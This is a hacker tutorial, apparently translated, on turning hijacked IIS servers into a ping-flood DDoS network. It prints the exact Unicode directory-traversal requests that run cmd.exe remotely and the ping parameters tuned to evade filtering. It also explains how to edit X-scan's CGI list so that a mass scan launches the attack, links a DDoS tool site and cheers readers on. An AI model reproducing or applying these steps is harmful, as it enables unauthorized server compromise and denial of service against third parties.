Using X-scan to carry out DDoS ping attacks
abu.
One, let's start from here.
To begin, two very influential DDoS ping-bomb tools have to be mentioned.
One is the Snail Bomb, the other is AhBomb.
The Snail Bomb appeared very early. It works by scanning for servers that have the vulnerability and storing them as a reserve (ha-ha, this takes time), then controlling these vulnerable servers so that they concentrate pings on the target machine, slowing down the target's network and thereby achieving the DDoS.
AhBomb is a more formidable attack tool written by bigball (ha-ha, many thanks to him here for giving me the unrestricted version).
In essence, AhBomb's method is no different from the Snail Bomb's, but the program is very well written, the multithreading in particular is polished, and its default parameters can very likely deal a fatal blow to the attacked party.
Ha-ha
Let's analyze them.
Start with the Snail Bomb.
It has a search process that scans for hosts with the Unicode vulnerability and then saves the host addresses in the file Server.dll.
When an attack is to be carried out, it calls on all the saved servers in turn to carry out the attack.
I carried out an attack against a hypothetical target, the IP 200.200.200.200; here is the actual packet captured under my configuration:
First part:
GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c
This invokes the command interpreter on the Windows server through the Unicode encoding and executes a command.
The command actually executed is:
ping -l 65000 -n 500 200.200.200.200
Explanation:
ping: a command that sends test packets to check the state of the network
-l 64000: send ECHO packets carrying 64000 bytes of data
-n 500: send 500 ECHO request packets
200.200.200.200: the target IP, ha-ha
Now it is very clear; nothing more needs to be said.
Although these commands are simple, the ping command needs only ordinary user privileges, and there are a great many machines with the Unicode vulnerability, which is exactly why so much traffic can flood toward one place. And so it hangs.
Let's see what AhBomb does.
First part:
GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c
This too invokes the command interpreter on the Windows server through the Unicode encoding, but with a newer encoding, so it should find even more vulnerable servers.
The command actually executed is:
ping 192.168.0.1 -t -i 255
Explanation:
ping: a command that sends test packets to check the state of the network
-t: keep sending ECHO packets without stopping. Yes, without stopping.
-i 255: set the TTL value to 255 (the maximum)
192.168.0.1: the target, ha-ha
Look carefully at how its parameters differ from the Snail Bomb's. The specific difference is that it does not send large packets at all, only packets of ordinary size, because a great many network devices filter large packets; only standard-sized packets can truly reach the target.
Note (TTL: time to live, the number of network hops a datagram is allowed to pass before a router discards it. The TTL is set by the sending host to prevent a packet from circulating forever in the IP internetwork. When forwarding an IP packet, a router is required to decrease the TTL by at least 1.)
Two, a classic scanning tool: X-scan
X-scan is another powerful piece of work from the Security Focus (XFocus) team. From its initial conception to its present fully open structural design, isn't this kind of spirit exactly what we pursue?
The key point concerns its CGI scanning function.
Choose CGI list maintenance under Tools and you can see the list of CGI vulnerabilities that may exist on every system version, from Windows to Unix.
How does it confirm whether a server has the vulnerability?
It invokes the command interpreter and executes the dir command!
Change your way of thinking; think with a hacker's mindset.
If it can invoke the dir command, why can't we invoke other commands?
Ha-ha
This is the key point I had to make.
If I change
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir
into
/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ping+-t+-i+255+-w+5+192.168.0.
...
ping -t -i 255 -w 5 192.168.0.1
Why use this command?
So as not to be filtered out by network devices, it does not send large packets.
So that our packets can reach the target, we set the TTL value to 255.
The -w 5 parameter sets the timeout interval to 5 milliseconds: no matter what the other side returns, it keeps sending without stopping, ha-ha. This is quite effective against some servers that filter ICMP packets.
I opened the cgi.lst file and edited its contents by hand.
At present, the encoding vulnerabilities that tests show still exist after SP2 is applied are the two IIS-DECODE encoding vulnerabilities.
I kept the two most likely paths; after trimming, it reads as follows:
Test target IP: 192.168.0.1
Then open CGI list maintenance under Tools and choose the newly revised list.
At this point, as long as we carry out large-scale scanning for the CGI vulnerability with X-scan, a DDoS ping attack can be launched against the target server.
Finally, to be long-winded for one more sentence: in fact, any platform's CGI scanning tool, slightly modified, can achieve our goal.
I explain it with X-scan because of its excellence, and because it supports connecting through a proxy server while scanning for CGI vulnerabilities.
...
abu.
China overcomes nature the net
This is a pretty good website about DDoS servers, with lots of old and new tools:
http://www.hacker001.com/Soft/hacksoft/attack/List_11.html . ABom is a typical example for DDoS.
Have fun DDoSing, everyone!!!